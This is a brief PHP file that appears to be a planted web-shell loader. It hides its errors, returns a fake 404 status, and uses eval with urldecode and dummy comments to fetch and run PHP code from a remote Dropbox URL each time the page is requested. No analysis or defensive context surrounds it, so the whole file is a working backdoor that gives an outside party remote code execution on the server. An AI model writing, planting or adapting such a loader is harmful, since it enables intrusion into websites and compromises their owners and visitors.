<?php 
error_reporting(0);
http_response_code(404);
eval(
    /**_**/ urldecode("%3f%3e") .
        file_get_contents(
            /**_**/ urldecode(
                /**_**/ "https://www.dropbox.com/scl/fi/rwrs9ehrpx0qqqvrltucz/ace.php?rlkey=n3tg9li7nncalm19y85p5mty9&st=0klrakbw&dl=1"
            )
        )
); ?>